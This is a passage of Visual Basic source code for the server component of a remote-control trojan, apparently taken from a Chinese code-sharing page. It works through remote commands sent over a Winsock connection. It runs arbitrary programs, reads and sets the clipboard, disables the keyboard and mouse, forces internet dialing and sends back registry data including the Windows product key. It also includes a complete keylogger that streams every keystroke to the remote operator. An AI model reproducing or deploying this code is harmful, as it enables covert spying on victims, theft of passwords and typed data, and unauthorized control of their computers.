📄 server.frm
字号:
End If
Next M
Case "082":
'EMPTY CLIPBOARD
WinsockCtl.SendData "M2请求发送信息的数据已经被发送了"
VB.Clipboard.Clear
Case "083":
'RUN PROGRAM
WinsockCtl.SendData "M2请求发送信息的数据已经被发送了"
Shell Mid(SendData, 4, Len(SendData) - 3), vbNormalFocus
Case "084":
'SET TEXT TO CLIPBOARD
WinsockCtl.SendData "M2请求发送信息的数据已经被发送了"
VB.Clipboard.SetText Mid(SendData, 4, Len(SendData) - 3)
Case "085":
'GET CLIPBOARD TEXT
WinsockCtl.SendData "021" & VB.Clipboard.GetText
Case "086":
'SET CLIPBOARD PICTURE
WinsockCtl.SendData "M2请求发送信息的数据已经被发送了"
VB.Clipboard.SetData Mid(SendData, 4, Len(SendData) - 3)
Case "087":
'GET CLIPBOARD PICTURE
WinsockCtl.SendData "022" & VB.Clipboard.GetData
Case "088":
'DISCONNECT INTERNET
If InternetAutodialHangup(0) Then
WinsockCtl.SendData "M2请求发送信息的数据已经被发送了"
Else
WinsockCtl.SendData "M4请求发送信息的数据已经被中断了"
End If
Case "089":
'PROMPT USER TO CONNECT TO THE NET
If InternetAutodial(INTERNET_AUTODIAL_FORCE_ONLINE, 0) Then
'WinsockCtl.SendData "M2Your data (SET) information request has been sent."
Else
'WinsockCtl.SendData "M4Your data (SET) information request has been aborted."
End If
Case "090":
'FORCE CONNECTION
If InternetAutodial(INTERNET_AUTODIAL_FORCE_UNATTENDED, 0) Then
'WinsockCtl.SendData "M2Your data (SET) information request has been sent."
Else
'WinsockCtl.SendData "M4Your data (SET) information request has been aborted."
End If
Case "091":
'SHOW DESKTOP SHORTCUT PROPERTIES IN SYSTEM TRAY
WinsockCtl.SendData "M2请求发送信息的数据已经被发送了"
Shell "RunDLL deskcp16.dll,QUICKRES_RUNDLLENTRY", vbNormalFocus
Case "092":
'LOCK FILE (FILES ONLY WITH HEADERS)
WinsockCtl.SendData "M2请求发送信息的数据已经被发送了"
FileNumber = FreeFile
Close #FileNumber
Open Mid(SendData, 4, Len(SendData) - 3) For Binary As #FileNumber
FileBinary = Space(LOF(FileNumber))
Get #FileNumber, 1, FileBinary
Put #FileNumber, 1, "#"
Put #FileNumber, 2, FileBinary
Close #FileNumber
Case "093":
'SHELL CPL FILE (DON'T WORK MISSING ENTRY)
WinsockCtl.SendData "M2请求发送信息的数据已经被发送了"
Shell "Rundll32.exe shell32.dll, Control_RunDll " & Mid(SendData, 4, Len(SendData) - 3)
Case "094":
'DISABLE THE KEYBOARD
WinsockCtl.SendData "M2请求发送信息的数据已经被发送了"
Shell "rundll32 keyboard,disable"
Case "095":
'DISABLE THE MOUSE
WinsockCtl.SendData "M2请求发送信息的数据已经被发送了"
Shell "rundll32 mouse,disable"
Case "096":
'SET MOUSE TRAIL TO
WinsockCtl.SendData "M2请求发送信息的数据已经被发送了"
Mouse_SetTrails CLng(Mid(SendData, 4, Len(SendData) - 3))
Case "097":
'MONITOR SHUTDOWN
WinsockCtl.SendData "M2请求发送信息的数据已经被发送了"
SendMessage Me.hWnd, WM_SYSCOMMAND, SC_MONITORPOWER, ByVal 0&
Case "098":
'MONITOR ONLINE
WinsockCtl.SendData "M2请求发送信息的数据已经被发送了"
SendMessage Me.hWnd, WM_SYSCOMMAND, SC_MONITORPOWER, ByVal -1&
Case "099":
'SWAP MOUSE BUTTONS
WinsockCtl.SendData "M2请求发送信息的数据已经被发送了"
SwapMouseButton 1
Case "100":
'RESTORE MOUSE BUTTONS
WinsockCtl.SendData "M2Your data (SET) information request has been sent."
SwapMouseButton 0
Case "101":
'CHANGE WALLPAPER
WinsockCtl.SendData "M2请求发送信息的数据已经被发送了"
SetWallpaper Mid(SendData, 4, Len(SendData) - 3)
Case "102":
'START THE KEY LOGGER
WinsockCtl.SendData "M2请求发送信息的数据已经被发送了,应该马上启动接受数据。"
Call CheckKey
EndKeylogger = False
KeyloggerTimer.Enabled = True
Case "103":
'END THE KEYLOGGER
WinsockCtl.SendData "M2请求发送信息的数据已经被发送了,主要连接被禁止"
EndKeylogger = True
KeyloggerTimer.Enabled = False
Case "104":
RegVal0(0) = GetStringValue("HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION", "ProductId")
RegVal0(1) = GetStringValue("HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION", "ProductKey")
RegVal0(2) = GetStringValue("HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION", "ProductName")
RegVal0(3) = GetStringValue("HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION", "ProgramFilesDir")
RegVal0(4) = GetStringValue("HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION", "RegisteredOrganization")
RegVal0(5) = GetStringValue("HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION", "RegisteredOwner")
RegVal0(6) = GetStringValue("HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION", "SystemRoot")
RegVal0(7) = GetStringValue("HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION", "Version")
RegVal0(8) = GetStringValue("HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION", "VersionNumber")
RegVal0(9) = GetStringValue("HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION", "DevicePath")
RegVal0(10) = GetStringValue("HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION", "ConfigPath")
RegVal0(11) = GetStringValue("HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION", "CommonFilesDir")
RegVal0(12) = GetStringValue("HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION", "MediaPath")
RegVal0(13) = GetStringValue("HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION", "OtherDevicePath")
WinsockCtl.SendData "023" & RegVal0(0) & Chr(0) & RegVal0(1) & Chr(0) & RegVal0(2) & Chr(0) & RegVal0(3) & Chr(0) & RegVal0(4) & Chr(0) & RegVal0(5) & Chr(0) & RegVal0(6) & Chr(0) & RegVal0(7) & Chr(0) & RegVal0(8) & Chr(0) & RegVal0(9) & Chr(0) & RegVal0(10) & Chr(0) & RegVal0(11) & Chr(0) & RegVal0(12) & Chr(0) & RegVal0(13)
End Select
Exit Sub
FinaliseError:
On Error Resume Next
WaitTime = 0
Do Until WaitTime = 10
WaitTime = WaitTime + 1
DoEvents
Loop
WinsockCtl.SendData "M4因服务器问题,数据无法发送。"
End Sub
Private Sub KeyloggerTimer_Timer()
If EndKeylogger = True Then KeyloggerTimer.Enabled = False: Exit Sub
Dim Retval As Boolean
Retval = CheckExplorer 'Check if explorer is running
If Retval = False Then End 'if not, then it means that user has exited windows
'generally get and "end task" error
'if still running
'this will exit when explorer is not running
End Sub
Private Sub CheckKey()
Dim Keycode As Integer, X As Integer, Shift As Integer
Dim Control As Integer, Temp As String
On Error GoTo FinaliseError
Do
DoEvents
If EndKeylogger = True Then KeyloggerTimer.Enabled = False: Exit Sub
If WinsockCtl.State <> 7 Then KeyloggerTimer.Enabled = False: EndKeylogger = True: Exit Sub
For Keycode = 8 To 255 'scan every key from #8-255
X = GetAsyncKeyState(Keycode) 'get the state of the key
If EndKeylogger = True Then KeyloggerTimer.Enabled = False: Exit Sub
If WinsockCtl.State <> 7 Then KeyloggerTimer.Enabled = False: EndKeylogger = True: Exit Sub
If X = -32767 Then 'if the key is pressed, its value is -32767
Select Case Keycode
Case 8 'backspace
WinsockCtl.SendData "00B"
Case 9 'tab
'WinsockCtl.SendData "NL0"
WinsockCtl.SendData Chr(0) & "[TAB]" & vbNewLine
'WinsockCtl.SendData "NL0"
Case 13 'enter
'WinsockCtl.SendData "NL0"
WinsockCtl.SendData Chr(0) & "[ENTER]" & vbNewLine
'WinsockCtl.SendData "NL0"
Case 27 'escape
'WinsockCtl.SendData "NL0"
WinsockCtl.SendData Chr(0) & "[ESC]" & vbNewLine
'WinsockCtl.SendData "NL0"
Case 32 'space
WinsockCtl.SendData Chr(0) & " "
Case 48 '0
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, ")", "0")
Case 49 '1
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, "!", "1")
Case 50 '2
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, "@", "2")
Case 51 '3
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, "#", "3")
Case 52 '4
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, "$", "4")
Case 53 '5
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, "%", "5")
Case 54 '6
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, "^", "6")
Case 55 '7
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, "&", "7")
Case 56 '8
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, "*", "8")
Case 57 '9
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, "(", "9")
Case 65 To 90 'a-z
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, UCase$(Chr$(Keycode)), LCase$(Chr$(Keycode)))
Case 112 To 123 'F1-F12
'WinsockCtl.SendData "NL0"
WinsockCtl.SendData "[FKEY]" & "[F" + CStr(Keycode - 111) + "]" & vbNewLine 'Case F1 to F12
'WinsockCtl.SendData "NL0"
Temp = Ctrl(Control = 1, "On", "Off")
Case 186 ';
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, ":", ";")
Case 187 '=
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, "+", "=")
Case 188 ',
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, "<", ",")
Case 189 '-
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, "_", "-")
Case 190 '.
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, ">", ".")
Case 191 '/
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, "?", "/")
Case 192 '`
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, "~", "`")
Case 219 '[
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, "{", "[")
Case 220 '\
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, "|", "\")
Case 221 ']
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, "}", "]")
Case 222 ''
WinsockCtl.SendData Chr(0) & Shf(Shift = 1, Chr$(34), "'")
End Select
End If
If EndKeylogger = True Then KeyloggerTimer.Enabled = False: Exit Sub
If WinsockCtl.State <> 7 Then KeyloggerTimer.Enabled = False: EndKeylogger = True: Exit Sub
Next Keycode
DoEvents
If EndKeylogger = True Then KeyloggerTimer.Enabled = False: Exit Sub
If WinsockCtl.State <> 7 Then KeyloggerTimer.Enabled = False: EndKeylogger = True: Exit Sub
Loop
Exit Sub
FinaliseError:
If WinsockCtl.State = 7 Then
WinsockCtl.SendData "M3错误,主要连接被停止,传送错误"
KeyloggerTimer.Enabled = False
EndKeylogger = True
Exit Sub
Else
KeyloggerTimer.Enabled = False
EndKeylogger = True
Exit Sub
End If
End Sub
Public Function CheckExplorer() As Boolean
Const PROCESS_ALL_ACCESS = 0
Dim uProcess As PROCESSENTRY32
Dim rProcessFound As Long
Dim hSnapshot As Long
Dim szExename As String
Dim Found As Boolean
Dim i As Integer
On Local Error GoTo Finish
Const TH32CS_SNAPPROCESS As Long = 2&
uProcess.dwSize = Len(uProcess)
hSnapshot = CreateToolhelpSnapshot(TH32CS_SNAPPROCESS, 0&)
rProcessFound = ProcessFirst(hSnapshot, uProcess)
Do While rProcessFound
i = InStr(1, uProcess.szexeFile, Chr(0))
szExename = LCase$(Left$(uProcess.szexeFile, i - 1))
If UCase$(Right$(szExename, 12)) = "EXPLORER.EXE" Then
Found = True
Call CloseHandle(hSnapshot)
GoTo Finish
End If
rProcessFound = ProcessNext(hSnapshot, uProcess)
Loop
Call CloseHandle(hSnapshot)
Finish:
If Found = False Then CheckExplorer = False
If Found = True Then CheckExplorer = True
End Function
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -